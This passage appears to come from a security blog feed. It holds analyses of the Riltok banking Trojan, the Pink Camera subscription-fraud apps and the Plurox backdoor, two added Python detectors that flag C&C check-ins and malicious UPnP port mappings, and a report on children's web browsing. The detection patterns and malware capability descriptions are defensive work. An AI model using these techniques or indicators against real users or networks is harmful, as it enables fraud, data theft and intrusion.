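# Combined log format: client ident user [time] "METHOD url HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

CHECKIN_SCRIPTS = {"gate.php", "gating.php"}   # registration endpoint (older / later versions)
REPORT_SCRIPT = "report.php"                   # device data, contacts and SMS upload endpoint
SCREEN_VALUES = {"on", "off", "none"}          # the only values the Trojan sends


def classify(line):
    """Return 'checkin', 'report' or None for a single access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    script = url.path.rsplit("/", 1)[-1].lower()   # the panel may live in a subdirectory
    params = parse_qs(url.query)
    if m.group("method") == "GET" and script in CHECKIN_SCRIPTS:
        screen = params.get("screen", [""])[0].lower()
        # Require both parameters: a bare gate.php hit is far too common to alert on.
        if params.get("id") and screen in SCREEN_VALUES:
            return "checkin"
    if m.group("method") == "POST" and script == REPORT_SCRIPT:
        return "report"
    return None


def find_beaconing_clients(lines):
    """Map client address -> sorted beacon kinds seen. A client showing both a
    check-in and a report matches the full registration sequence."""
    seen = {}
    for line in lines:
        kind = classify(line)
        if kind:
            client = LOG_RE.match(line).group("client")
            seen.setdefault(client, set()).add(kind)
    return {client: sorted(kinds) for client, kinds in seen.items()}


# Constructed sample log: two infected devices and one unrelated gate.php hit.
SAMPLE_LOG = [
    '10.0.0.7 - - [20/Jun/2019:09:12:01 +0000] "GET /panel/gate.php?id=3f9a1c&screen=on HTTP/1.1" 200 15 "-" "Dalvik/2.1.0 (Linux; U; Android 8.0.0)"',
    '10.0.0.7 - - [20/Jun/2019:09:12:05 +0000] "POST /panel/report.php HTTP/1.1" 200 2 "-" "Dalvik/2.1.0 (Linux; U; Android 8.0.0)"',
    '10.0.0.9 - - [20/Jun/2019:09:13:44 +0000] "GET /gate.php?page=2 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '10.0.0.12 - - [20/Jun/2019:09:14:10 +0000] "GET /gating.php?id=77ab0d&screen=none HTTP/1.1" 200 15 "-" "Dalvik/2.1.0 (Linux; U; Android 7.1)"',
]

if __name__ == "__main__":
    for client, kinds in find_beaconing_clients(SAMPLE_LOG).items():
        print(client, kinds)
```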

Trojan anatomy

The family was named Riltok after the librealtalk-jni.so library contained in the APK file of the Trojan. The library includes such operations as:

  • Get address of cybercriminal C&C server
  • Get configuration file with web injects from C&C, as well as default list of injects
  • Scan for app package names that generated AccessibilityEvent events in the list of known banking/antivirus/other popular apps
  • Set malware as default SMS app
  • Get address of the phishing page that opens when the app runs, and others

getStartWebUrl function – get address of phishing page

The configuration file contains a list of injects for mobile banking apps – links to phishing pages matching the mobile banking app used by the user. In most so-called Western versions of the Trojan, the package names in the default configuration file are erased.

Sample configuration file of the Trojan

Through AccessibilityService, the malware monitors AccessibilityEvent events. Depending on which app (package name) generated the event, Riltok can:

  • Open a fake Google Play screen requesting bank card details
  • Open a fake screen or phishing page in a browser (inject) mimicking the screen of the relevant mobile banking app and requesting user/bank card details
  • Minimize the app (for example, antivirus applications or device security settings)

Additionally, the Trojan can hide notifications from certain banking apps.

List of package names of apps on events from which the Trojan opens a fake Google Play window (for the Russian version of the Trojan)

Example of Trojan screen overlapping other apps

When bank card details are entered in the fake window, Riltok performs basic validation checks: card validity period, number checksum, CVC length, whether the number is in the black list sewn into the Trojan code:

Examples of phishing pages imitating mobile banks

At the time of writing, the functionality of most of the Western versions of Riltok was somewhat pared down compared to the Russian one. For example, the default configuration file with injects is non-operational, and the malware contains no fake built-in windows requesting bank card details.


Threats are better prevented than cured, so do not follow suspicious links in SMS, and be sure to install apps only from official sources and check what permissions you are granting during installation. As Riltok shows, cybercriminals can apply the same methods of infection to victims in different countries with more or less the same success.

Kaspersky products detect the above-described threat with the verdict Trojan-Banker.AndroidOS.Riltok.



Examples of malware

June 20, 2019

Not-so-dear subscribers

Many people have had a run-in with subscriptions to mobile content providers. They appear out of the blue, and get discovered only when account funds run dry. It might seem that the obvious solution is not to visit dubious sites and not to install apps from third-party sources. But, alas, these days such advice is clearly not enough. We recently discovered several apps in Play Market directly related to such intrusive services.

Pink Camera (com.paint.oil) and Pink Camera 2 (com.psbo.forand) are identical save for the numeral in the name; each has been installed more than 10,000 times

On the face of it, they are ordinary photo editors, but suspicions start to creep in on perusing the list of permissions. For example, the apps request access to Wi-Fi controls, which is rather unusual for this type of software. What’s more, when run, the editors request access to notifications — and keep doing it till the user says “yes.” Next, while the user is trying to embellish a photo (using the meager functionality), the app collects information in the background about the device and sends it to the server ps.okyesmobi[.]com.

Example of a request received after decrypting app traffic:

    {
      "q1": "201905211050",                      // app ID
      "y": 1184,                                 // screen height
      "sign": "308F03D2E9173D9A1A43DFA15FDAF47D",
      "z": "PUSH",
      "e": "201905211050",
      "pl": "25011",                             // network operator code
      "cf": "111,108",
      "s1": "104870",
      "a": "862921000707889",                    // IMEI
      "i": 720,                                  // screen width
      "b": "250110201713837",                    // IMSI
      "c": "unknown",
      "j": "ru",
      "d": "S10",                                // phone model
      "e1": 1                                    // Wi-Fi status
    }

As can be seen, information is transmitted about the device and network operator. In response, the software receives a set of links (depending on the country and network operator) to the pages:

    {
      "sts": 200,
      "ph": "",
      "js": [],
      "list": [
        {
          "sta": 0,
          "cf": "111",
          "dy": 0,
          "tl": "http://of.okyesmobi[.]com/redirect?uid=F867D2329F195671825571419DB5B7FA67880B4E99583D6B&sourceid=2300&clickid=104870_112672190_250110201713837_862921000707889_201905211050_0.31_94.25.169.249",
          "id": 0,
          "oid": 112672190
        }
      ],
      "cr": [
        {
          "tl": "http://of.okyesmobi[.]com/redirect?uid=35092271DFB564AE09748A8CF282E15D089A4800D04DE5FE&sourceid=2300&clickid=104870_155608136_250110201713837_862921000707889_201905211050_0.36_94.25.169.249&p=1",
          "oid": 155608136
        },
        {
          "tl": "http://of.okyesmobi[.]com/redirect?uid=71CBD61E0439CE5B6B6EF0BC46C140A842767CC39AC9A56E&sourceid=2300&clickid=104870_130581973_250110201713837_862921000707889_201905211050_0.24_94.25.169.249&p=1",
          "oid": 130581973
        }
      ],
      "wf": true
    }

After several redirects, the addresses take the user to a subscription page. Our technologies detect these pages as not-a-virus:HEUR:AdWare.Script.Linkury.gen.

Examples of “subscription” pages

On receiving the addresses of the malicious pages, the program loads them in a window unseen by the user. Before doing so, the app turns off Wi-Fi in the user’s phone, thereby activating mobile data to simplify the subscription process.

The app then decrypts a Java helper script stored in the app resources, and performs the actions required to activate the subscription:

  • It substitutes the user’s phone number (obtained while harvesting information) into the relevant field.
  • If the subscription page is CAPTCHA-protected, the app uses the image recognition service chaojiying[.] and automatically inserts the result into the relevant field on the page.
  • If an SMS code is required, the app gets it through access to notifications.
  • It clicks the “subscribe” button.

How to protect yourself

Analysis of pages loaded by the malware revealed the targets to be users from different countries, while its distribution through an official app store helped the authors to spread it far and wide. To avoid the hook and save money on your mobile phone account, we recommend carefully studying the list of requested permissions during app installation and installing a security solution on your smartphone capable of detecting this type of threat. Additionally, you can enable content-blocking options, or open a “content account” — a free service offered by some carriers for managing subscription payments.



June 18, 2019

Plurox: Modular backdoor

In February this year, a curious backdoor passed across our virtual desk. The analysis showed the malware to have a few quite unpleasant features. It can spread itself over a local network via an exploit, provide access to the attacked network, and install miners and other malicious software on victim computers. What’s more, the backdoor is modular, which means that its functionality can be expanded with the aid of plugins, as required. Post-analysis, the malware was named Backdoor.Win32.Plurox.

Key features

Plurox is written in C and compiled with MinGW GCC, and judging by the presence of debug lines, the malware was still at the testing stage when detected.

Debug lines in the samples we found

The backdoor uses the TCP protocol to communicate with the C&C server; plugins are loaded and directly interfaced via two different ports, which are stitched into the body of Plurox; the C&C addresses are also hardcoded into the bot. When monitoring the malware’s activity, we detected two “subnets.” In one, Plurox receives only miners (auto_proc, auto_cuda, auto_gpu_nvidia modules) from the C&C center, while in the other, besides miners (auto_opencl_amd, auto_miner), it is passed several plugins, which will be discussed later.

The Plurox family has virtually no encryption, only a few 4-byte keys are applied for the regular XOR cipher. The packet for calling the C&C server looks as follows:

The buffer contains an XORed string with the key at the start of the packet. The response from the C&C center contains the command to be executed, plus data for its execution, which is encrypted using XOR. When the plugin is loaded, the bot itself selects the required bitness and requests both auto_proc and auto_proc64. In response there arrives a packet with an encrypted plugin, the usual MZ-PE.

Supported commands

The Plurox version we found supports a total of seven commands:

  • Download and run files using WinAPI CreateProcess
  • Update bot
  • Delete and stop (delete own service, remove from autoload, delete files, remove artifacts from registry)
  • Download and run plugin
  • Stop plugin
  • Update plugin (stop process and delete file of old version, load and start new one)
  • Stop and delete plugin


During the monitoring, we managed to detect several Plurox plugins and study them all.

Plugin miners

The malware can install on the victim computer one of several cryptocurrency miners, depending on the particular system configuration. The bot sends the package with the system configuration to the C&C server, and in response it receives information about which plugin to download. We counted eight mining modules in total, whose features can be guessed from their names:

  • auto_proc
  • auto_cuda
  • auto_miner
  • auto_opencl_amd
  • auto_gpu_intel
  • auto_gpu_nvidia
  • auto_gpu_cuda
  • auto_gpu_amd

UPnP plugin

The module receives from the C&C a subnet with mask /24, retrieves all IP addresses from it, and attempts to forward ports 135 (MS-RPC) and 445 (SMB) for the currently selected IP address on the router using the UPnP protocol. If successful, it reports the result to the C&C center, waits for 300 seconds (5 minutes), and then deletes the forwarded ports. We assume that this plugin can be used to attack a local network. It would take an attacker just five minutes to sort through all existing exploits for services running on these ports. If the administrators notice the attack on the host, they will see the attack coming directly from the router, not from a local machine. A successful attack will help the cybercriminals gain a foothold in the network.

According to its description, the plugin is very similar to EternalSilence, except that port 135 is forwarded instead of 139. See this Akamai article for details of EternalSilence:

    {"NewProtocol": "TCP", "NewInternalPort": "445", "NewInternalClient": "",
     "NewPortMappingDescription": "galleta silenciosa", "NewExternalPort": "47622"}

And here’s the Plurox plugin template:

<NewPortMappingDescription>galleta silenciosa</NewPortMappingDescription>

In the two examples, a matching line is highlighted — a description of port forwarding.
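For defenders, the two traits visible in the EternalSilence and Plurox templates above (a mapping to internal port 135/139/445 and the shared “galleta silenciosa” description) are enough to triage AddPortMapping requests seen by a UPnP-aware IDS or in a router's request log. The following is an added example, not part of the Kaspersky write-up or the malware; the SOAP request bodies and LAN addresses are constructed.

```python
"""Flag UPnP AddPortMapping requests that look like the Plurox UPnP plugin
or EternalSilence.

Added example, not from the Kaspersky write-up or the malware. It parses the
SOAP body of an AddPortMapping request and lists why a mapping is suspicious.
The request bodies and LAN addresses below are constructed.
"""
import xml.etree.ElementTree as ET

RISKY_INTERNAL_PORTS = {135, 139, 445}            # MS-RPC, NetBIOS session, SMB
KNOWN_BAD_DESCRIPTIONS = {"galleta silenciosa"}   # shared by Plurox and EternalSilence


def _local(tag):
    """Strip an XML namespace from a tag ('{uri}name' -> 'name')."""
    return tag.rsplit("}", 1)[-1]


def parse_add_port_mapping(soap_xml):
    """Return the AddPortMapping arguments as a dict, or None if not present."""
    root = ET.fromstring(soap_xml)
    for elem in root.iter():
        if _local(elem.tag) == "AddPortMapping":
            return {_local(child.tag): (child.text or "").strip() for child in elem}
    return None


def assess_mapping(mapping):
    """Return the reasons a mapping is suspicious; an empty list means benign."""
    reasons = []
    try:
        internal_port = int(mapping.get("NewInternalPort", ""))
    except ValueError:
        internal_port = None
    if internal_port in RISKY_INTERNAL_PORTS:
        reasons.append("exposes internal port %d (MS-RPC/SMB)" % internal_port)
    desc = mapping.get("NewPortMappingDescription", "").strip().lower()
    if desc in KNOWN_BAD_DESCRIPTIONS:
        reasons.append("description matches a known malware template: %r" % desc)
    # EternalSilence leaves NewInternalClient empty (the router then fills in the
    # requester's address); the UPnP spec requires it, so an empty value is odd.
    if not mapping.get("NewInternalClient"):
        reasons.append("empty NewInternalClient")
    return reasons


def triage(requests):
    """Map request index -> reasons, for every request whose mapping is suspicious."""
    hits = {}
    for i, body in enumerate(requests):
        mapping = parse_add_port_mapping(body)
        if mapping is not None:
            reasons = assess_mapping(mapping)
            if reasons:
                hits[i] = reasons
    return hits


def _soap(external, protocol, internal, client, description):
    """Build a constructed AddPortMapping request body for the samples."""
    return """<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>
<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost></NewRemoteHost><NewExternalPort>{ext}</NewExternalPort>
<NewProtocol>{proto}</NewProtocol><NewInternalPort>{port}</NewInternalPort>
<NewInternalClient>{client}</NewInternalClient><NewEnabled>1</NewEnabled>
<NewPortMappingDescription>{desc}</NewPortMappingDescription>
<NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>""".format(
        ext=external, proto=protocol, port=internal, client=client, desc=description)


# Constructed samples: Plurox-style, an ordinary console mapping,
# EternalSilence-style (empty client), and a risky port behind an innocent label.
SAMPLE_REQUESTS = [
    _soap(47622, "TCP", 445, "192.168.1.23", "galleta silenciosa"),
    _soap(3074, "UDP", 3074, "192.168.1.40", "Xbox Live"),
    _soap(47622, "TCP", 445, "", "galleta silenciosa"),
    _soap(60135, "TCP", 135, "192.168.1.23", "Skype"),
]

if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_REQUESTS).items():
        print("request %d: %s" % (index, "; ".join(reasons)))
```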

SMB plugin

This module is responsible for spreading malware over the network using the EternalBlue exploit. It is identical to the wormDll32 module from Trojan.Win32.Trickster, but with no debug lines in the code, plus the payload in the exploit is loaded using sockets.

Left: Plurox SMB plugin injected code, right: WormDll injected code

Left: Plurox SMB plugin NetServerEnum, right: Trickster WormDll NetServerEnum

As can be seen in these samples, not only is the injected code similar, but also the code for standard procedures. Based on this, we can assume that the analyzed samples were taken from the same source code (commented lines in the Trickster plugin are missing in the Plurox plugin), which means the respective creators of Plurox and Trickster may be linked.

Kaspersky Lab security solutions detect the bot and its plugins with the verdicts Backdoor.Win32.Plurox and HEUR:Trojan.Win32.Generic.


C&C servers

June 12, 2019

What kids get up to online

Today’s children navigate the Internet better than adults. They are not afraid to try out new technology, and are quick to grasp new trends and sometimes invent their own. New social networks, mobile games, music, and gadgets are all part and parcel of their daily lives. But just because they feel at home online does not mean that they need not pay attention to potential hazards. To help children avoid potential dangers in the digital world, parents must understand what their children are interested in, know about the latest online trends, and be aware of what might pose a risk.

How statistics are collected

Kaspersky Lab solutions scan the content of web pages that children try to access. If a particular site belongs to one of fourteen unwanted categories, the module sends a notification to the Kaspersky Security Network (there is no transfer of personal user data and no violation of privacy). There are two important things to note about this:

  • Parents decide for themselves what content should be blocked and configure the application accordingly. However, anonymous statistics are collected across all fourteen categories.
  • Data is harvested only from computers running Windows and Mac OS; no mobile statistics are provided in this report.

Website categorization

In products that have Parental Control features, web filtering is currently performed across the following categories:

Filtering search queries

Children’s search activity is the best indicator of their interests. Kaspersky Safe Kids can filter children’s queries in five different search engines (Bing, Google, Mail.ru, Yahoo!, Yandex) on six potentially dangerous topics: Adult Content, Alcohol, Tobacco, Drugs, Racism, and Profanity.

We have grouped the search queries by language. We consider statistics for the English language as international due to its prevalence. All searches in a specific language, minus repeat queries, were taken as the 100% reference value. The popularity of each topic – defined as the percentage of queries about it – is calculated for each separate language and for the entire world.

Search queries sent to us during the period May 2018 – May 2019 were broken down into several thematic categories:

  • Alcohol, Tobacco, Drugs
  • Anime
  • News
  • Memes
  • Celebrities
  • Sports
  • Education
  • Music
  • Online Communication
  • Shopping
  • Online Translators
  • Adult Content
  • Video Games
  • Video

Global picture

Site categories

Over the past year, the global picture has changed quite radically.

Distribution of Parental Control and Safe Kids notifications across fourteen categories, May 2018 – May 2019 (download)

A few years ago, we noted a downward trend in the number of visits from PCs to sites in the Online Communication category, and this is continuing. Whereas last year, the share of this category was 59.68%, this year has seen a sharp drop, to 27.61%. At the same time, the share of the Software, Audio, Video category rose to 32.75% against 22.4% last year.

Electronic Commerce ranks third; compared with the data for 2017-2018, the popularity of online stores among children increased dramatically, from 2.83% to 14.18%. Children have started accessing news resources more frequently: Last year, this category accounted for slightly less than one percent, while this year’s figure stands at 8.78%.

The share of computer game-related sites was 3.01%, which is 1.98 p.p. lower than in the previous reporting period. Meanwhile, the share of adult content sites climbed to 2.08%, which is up 1.34 percentage points on last year (0.74%). The share of sites in the Alcohol, Tobacco, Drugs category collapsed, amounting to 0.64% (6.32% in the last reporting period).

Search queries

Distribution of users’ search queries by thematic category, May 2018 – May 2019 (download)

Children most commonly search for movies and cartoons on YouTube. Compared to last year, the share of search queries related to video content remained practically the same at 17.91% (17.25% in 2017-2018).

Although children visited gaming sites less frequently, they have not lost interest in the topic; the share of game-related search queries actually increased by 10.84 percentage points to 16.93%. Interest also rose in adult content (from 8.59% to 14.90%) and online shopping (from 2.4% to 8.72%). Meanwhile, interest in online translators remains at the same level as last year: 13.69% in 2018-2019 against 13.58% in the previous reporting period.

The number of queries related to social networks and online communication fell by a couple of percentage points, from 9.88% to 7.27%. This year, children searched more often for music (5.80% in 2018-2019 vs. 3.78% in 2017-2018) and topics related to education (5.45% vs. 4.86%), but there was a decline in the number of searches for anime (from 0.79% to 0.70%) and sports (from 3.69% to 3.40%).

Differences by region, country, and language

To understand the reasons behind the changes, we shall examine each of the popular categories in more detail, and take a look at the changes in different regions and countries.

Software, Audio, Video

Most often, children visited sites – and searched for information – relating to the Software, Audio, Video category.

Popularity of the Software, Audio, Video category in different regions, May 2018 – May 2019 (download)

Children in Africa more than anywhere else visit sites from this category. Their favorites include youtube.com, dvdvideosoft.com, dropbox.com, and play.google.com.

We see a rise in interest in this category in all regions with the exception of the Commonwealth of Independent States (CIS), where a slight drop occurred. This was the first year that we included the regions of Africa and South Asia in the statistics, so a comparison with the previous year is not possible.

Comparison of the popularity of the Software, Audio, Video category in different regions, May 2017 – May 2018 and May 2018 – May 2019 (download)

The largest growth in visits to sites with video, music, and software was observed in Arab countries: Their share of the total number of visited resources grew significantly from 8.70% to 42.57%. The most visited resources in this region are youtube.com, dvdvideosoft.com, play.google.com, and uptv.ir.

There was a marked increase in Latin America, too, from 12.60% to 32.54%. The most visited sites in this region are, of course, youtube.com along with play.google.com, dvdvideosoft.com, and spotify.com.

Popularity of the Software, Audio, Video category in different countries, May 2017 – May 2018 (download)

Kids in China spend more time than others watching videos and listening to music (69.36%). Last year, China also beat all other countries in this respect, but with a larger figure (78.76%).

Since we expanded the list of countries this time, some of last year’s frontrunners, such as Germany and Russia, are now closer to the foot of the ranking, although their share of visits did not change all that much: Germany (34.05%) saw a 2.09 p.p. swing and Russia (28.23%) 4.95 p.p.

In some countries, children’s time spent on listening to music and watching videos shot up. The figure grew exponentially in Saudi Arabia (from 0.38% to 51.34%), which could be related to the launch of Spotify in the region, Egypt (from 11.03% to 40.28%), Mexico (from 10.65% to 42.37%), the UAE (from 9.17% to 23.29%), and Brazil (from 13.53% to 27.44%). In all these countries, the most popular site in this category is youtube.com.

Distribution of search queries on the Video topic in different languages, May 2018 – May 2019 (download)

As we have seen, the top topic in search queries around the world is video, which generally corresponds to the map of visited sites, where for the first time ever Software, Audio, Video has dislodged Online Communication as the leading category.

In the English language, the percentage of video-related search queries increased against last year from 20.54% to 28.35%. The most common searches were for “youtube,” “netflix,” and “amazon prime.” As in previous years, the most searched-for blogger is PewDiePie. The top cartoon channels are Nickelodeon, Disney, and Cartoon Network. There was also heightened interest in Game of Thrones.

The Video category’s share of searches among Chinese-speaking children this time around came to 21.12% (4.21% in the last reporting period). In Chinese, children searched for 愛奇藝 (iQiyi, the Chinese online video platform) and 復仇者聯盟4 (Avengers: Endgame).

Note that search queries in English reflect the interests not just of English-speaking children, but of all kids in general, since children worldwide often search for platforms, services, games, and social networks by their English names. In particular, the most popular site, as well as the most popular search query among children, is YouTube.

The graph below shows the percentage of YouTube-related search queries in different languages, with all other queries on the video topic (cartoons, movies, TV shows). In English, for example, 70.58% of all queries on the video topic are linked to YouTube. Only in China are children not interested in this video platform, since the service is blocked there.

Comparison of the popularity of YouTube-related queries, and other searches on the video topic, May 2018 – May 2019 (download)

Another search topic in the Software, Audio, Video category is music. Compared to last year, children searched more often for songs, performers, and music videos. The sharpest hike in music-related queries came in the Japanese language, rising from 0.50% last year to 20.64% this year. This could be because Asian performers are wildly popular these days across the world, in particular the South Korean boy and girl bands BTS and BLACKPINK, and the Japanese virtual singer Hatsune Miku.

Distribution of thematic search queries on the music topic by language, May 2018 – May 2019 (download)

Besides music from Asia, children searched in English for the streaming service Spotify, singer Ariana Grande, rapper xxxtentacion (we wrote about him here), performer Marshmello, and singer Billie Eilish.

Online Communication

Each of our reports in recent years has noted a downward trend in children’s use of social networking sites and instant messengers on PCs. And now the day has come when the usual leader Online Communication has given way to video and music as the top category.

Popularity of the Internet Communication Media category in different regions, May 2018 – May 2019 (download)

Nevertheless, in our report’s new region, South Asia, children still communicate a lot online using desktops and laptops. In all other regions, we noticed a sharp drop in the number of visits. Facebook remains the most popular site in this category in practically all countries, with the exception of China.

Such a sharp drop in popularity can be put down to the craze among children and teenagers for the “mobile” social network TikTok (we wrote about it on our Kids Kaspersky portal, dedicated to keeping children safe). The steep decline could also be caused by the trend we have long observed for children to increasingly favor mobile over PC-based communication.

Comparison of the popularity of websites in the Internet Communication Media category in different regions, May 2017 – May 2018 and May 2018 – May 2019 (download)

Interestingly, as with the Software, Audio, Video category, the largest difference between the reporting periods is seen in Arab and Latin American countries.

Popularity of websites in the Internet Communication Media category in different countries, May 2018 – May 2019 (download)

The country-specific data also shows a decline in visits to sites in the Online Communication category. This could be due to various factors, including the scandals around Facebook and VKontakte over the confidentiality of user data, as well as with the growing popularity of “mobile” social networks, such as Instagram, SnapChat, and TikTok.

Distribution of search queries on the social networks topic in different languages, May 2018 – May 2019 (download)

As for search queries, Russian-speaking children most often searched for “ВК” (VK), “инстаграм” (instagram), and “скайп” (skype). Popular search queries in English were “facebook,” “instagram,” and “tiktok.” In Japanese, the most common searches were for stickers for the messenger Line. And in Arabic, they were for تويتر (Twitter) and Facebook.

Note that the share of search queries related to online communication decreased in most languages, as did visitor traffic to sites in this category. Their share in English decreased by 3.6 p.p. to 6.72%, and in Russian by 4.35 p.p. to 9.11% against the previous reporting period.

Distribution of search queries related to one of the four most popular social networks, May 2018 – May 2019

Electronic Commerce

Popularity of websites in the Electronic Commerce category in different regions, May 2018 – May 2019

Another category of resources more popular this year than last is Electronic Commerce. The most popular sites are Aliexpress, Amazon, and eBay. Children’s interest in the online store Aliexpress is growing year on year. This report has already noted the upward trend in the popularity of services of Chinese origin; for example, the social network TikTok belongs to the Chinese Internet company ByteDance.

Comparison of the popularity of websites in the Electronic Commerce category in different regions, May 2017 – May 2018 and May 2018 – May 2019

The most significant rise in the popularity of online stores over the past year came in CIS countries. The Top 3 sites by number of visits are Avito, Aliexpress, and Wildberries.

Popularity of websites in the Electronic Commerce category in different countries, May 2018 – May 2019

The country-specific data confirms that children in Belarus and Russia show most interest in online shopping.

Distribution of search queries on the online shopping topic in different languages, May 2018 – May 2019

What exactly children were looking for is revealed in the search queries. In Japanese, the most frequent searches were for products from the Rakuten store and the Japanese version of Amazon, as well as candy from the 7-Eleven store. The most popular stores in German were Zalando, Saturn, eBay Kleinanzeigen, and Tiger; in English, Amazon, eBay, Aliexpress, Ikea, and Asos; and in Russian, Aliexpress, Авито (Avito), Юлу (Yulu), and Детский мир (Children’s World).

As for brands, in this reporting period children searched for Nike, Adidas, Samsung, Gucci, Vans, Supreme, Zara, and Bershka. Product-wise, the younger generation showed interest in the iPhone X, iPhone 7, Huawei p20, Samsung S7, Nike and Adidas footwear, and various books.

Video Games

Compared to last year, the share of this category decreased almost threefold. This does not mean that children are losing interest in games, since some of the content they watch on YouTube is devoted specifically to games, including walkthroughs, analysis, and reviews.

Share of websites in the Video Games category in different regions, May 2018 – May 2019

Not for the first year, the region with the largest gaming category share is Oceania. And this year we saw growth: from 11.03% to 13.63%. The most popular gaming sites in Oceania are roblox.com, blizzard.com, steamcommunity.com, ubisoft.com, and ea.com.

In North America, the share of visits to gaming sites from PCs dropped from 13.05% to 7.70%. The most popular sites in this region are roblox.com, blizzard.com, and twitch.tv.

Comparison of the popularity of websites in the Video Games category in different regions, May 2017 – May 2018 and May 2018 – May 2019

The share of this category decreased in other regions, too. For instance, it fell from 10.02% to 4.19% in Europe, from 3.96% to 1.24% in Latin America, and from 3.03% to 2.81% in the CIS. In others, meanwhile, it increased: from 1.49% to 2.04% in the Arab world, and from 2.93% to 4.71% in Asia.

Popularity of websites in the Video Games category in different countries, May 2018 – May 2019

In the diagram, we see that in Australia (part of the Oceania region) the Video Games category has a greater share than in other countries (12.74%). It is followed by Germany (10.59%), which last year came mid-table, but this time ousted the UK (8.21%) from second place.

But the share of this category is still on a downward trend. This is likely due to the increased popularity of mobile games, which now attract children more than PC games. Overall, the mobile games market is growing year on year.

That said, PC games are still popular, although many of them have been adapted to mobile platforms and consoles. One example is Minecraft, which, judging by kids’ search queries, is still in high demand.

Distribution of search queries on the Video Games topic in different languages, May 2018 – May 2019

Unsurprisingly, the lion’s share of game-related search queries are in English, since most games have English-language titles. The most popular queries in English this past year were: fortnite, roblox, minecraft, epic games (the publisher of Fortnite), steam, twitch, discord, overwatch, and pubg.

It is worth noting that many of the top search queries in English were related to Fortnite, for example: fortnite tracker, fortnite download, fortnite battle royale, and epic games fortnite.

Fortnite is available on almost all possible gaming platforms (Microsoft Windows, macOS, Xbox One, PlayStation 4, iOS, Android, Nintendo Switch). The gameplay originally consisted in studying the in-game map, collecting resources, building fortifications, and simply surviving (including defending yourself against night-time zombies). But then the developers released the multiplayer deathmatch mode Fortnite Battle Royale, which later turned into a full-fledged game and became even more of a hit than the original. The queries “fortnite mobile” and “fortnite android” confirm our suspicion that children are increasingly switching allegiance to mobile games.

In addition to PC and mobile games, children were interested in consoles. They searched for Nintendo Switch, PS4, Xbox, and Playstation.

Adult Content

Many people worry about the extent to which children are interested in pornography and erotica.

In terms of percentage of all website categories visited from PCs, the Adult Content category in the past reporting year accounted for 2.08%, up 1.34 p.p. on last year (0.74%).

Share of websites in the Adult Content category in different regions, May 2018 – May 2019

The statistics by region show that the largest share of visits to adult sites belongs to Latin America (4.28%). In second place is South Asia (2.74%), with Asia in third place on 2.26%.

Comparison of the popularity of websites in the Adult Content category in different regions, May 2017 – May 2018 and May 2018 – May 2019

Compared to last year, the share of adult sites in Latin America climbed from 0.63% to 4.28%. In the CIS, we also saw an increase: from 0.48% to 2.09%. The most popular resources in the Adult Content category, as previously, are pornhub.com, xnxx.com, and livejasmin.com. Interestingly, in some regions this category became less popular. For example, it fell from 1.18% to 0.84% in Europe.

This is not the first year that Asia has posted an increased interest in the topic of pornography and erotica. Interestingly, this year it declined from 2.72% to 2.26%, but still remained quite high compared to other regions.

Share of websites in the Adult Content category in different countries, May 2018 – May 2019

Children in Japan are the most likely to try to visit (or actually visit if there is no parental block) porn sites – 7.82% of all website categories accessed by children from PCs. In second place is Brazil (7.34%), where children also show interest in adult content. Third place goes to Mexico (5.45%). The high figures in these countries mean that Asia and Latin America are the world’s leading regions in this category.

The language with the largest share of all porn-related search queries is Portuguese.

Distribution of search queries related to adult content in different languages, May 2018 – May 2019

In second place is Arabic, which last year accounted for the largest share of porn-related search queries (34.32%). Search queries in German came third.

Of interest here is not so much the sites that children visit from PCs, but the search queries they make; as we have noted in previous reports, children prefer viewing porn from mobile devices rather than PCs. Therefore, it would not be amiss to compare the search figures for the past two years:

Comparison of the popularity of Adult Content search queries in different languages, May 2017 – May 2018 and May 2018 – May 2019

Alcohol, Tobacco, Drugs

In the past two years, we have witnessed a downward trend in the number of visits by children worldwide to sites in the Alcohol, Tobacco, Drugs category.

Comparison of the popularity of websites in the Alcohol, Tobacco, Drugs category in different regions, May 2016 – May 2017, May 2017 – May 2018, and May 2018 – May 2019

Another reason for the decrease in the number of visits to sites in this category may be the loss of interest in electronic cigarettes and vapes. Whereas two or three years ago, vaping was all the rage, it is now a niche activity.

Popularity of websites in the Alcohol, Tobacco, Drugs category in different regions, May 2018 – May 2019

All the same, children in North America and Oceania are the most likely to visit sites related to alcohol, tobacco, or drugs. But in Europe, the figure fell against previous years. Interestingly, despite the regional figures, the share of visits to alcohol-, tobacco-, and drug-related sites in Japan (2.21%) is higher than in other countries. The US is in second place (1.59%), and Germany is in third (1.00%).

Popularity of websites in the Alcohol, Tobacco, Drugs category in different countries, May 2018 – May 2019

We cannot say for sure that children intentionally visit sites with such content, since the search queries that best reflect kids’ interest in the subject do not reveal any increase in such interest.

Distribution of search queries on the Alcohol, Tobacco, Drugs topic in different languages, May 2018 – May 2019

That said, in Chinese, children searched for 酒, 毒品 (alcohol, drugs); in German, “rauchen” (smoking), “bier” (beer), and “zigaretten” (cigarettes); in Portuguese, “maconha” (marijuana) and “caipirinha” (a Brazilian cocktail); and in Russian, “наркотики” (drugs), “алкоголь” (alcohol), and “сигареты” (cigarettes).


Besides the categories examined in this report, our investigation of search queries revealed other topics of interest to kids. For instance, search queries related to online translators are among the most popular.

Distribution of search queries related to the topic of online translation in different languages, May 2018 – May 2019

In French, children searched for “traduction francais anglais” and “traduction espagnol français”; in Spanish, “traductor español ingles” and “traductor español frances”; in Italian, “traduttore inglese italiano” and “traduttore francese italiano”; and in German, “google übersetzer” and “englisch deutsch”.

Distribution of sports-related search queries in different languages, May 2018 – May 2019

Portuguese-speaking children showed most interest in the topic of sport. Their search queries included Brazilian soccer stars and match results. Sports were also of great interest to children in the Arab world and Spanish-speaking countries. The vast majority of queries were soccer-related.

Distribution of celebrity-related search queries in different languages, May 2018 – May 2019

Children also searched for information about real-life celebrities and various fictional characters. Interestingly, whatever the language, children most often searched for the same names: Harry Potter, Hitler, Donald Trump, and Kim Kardashian.

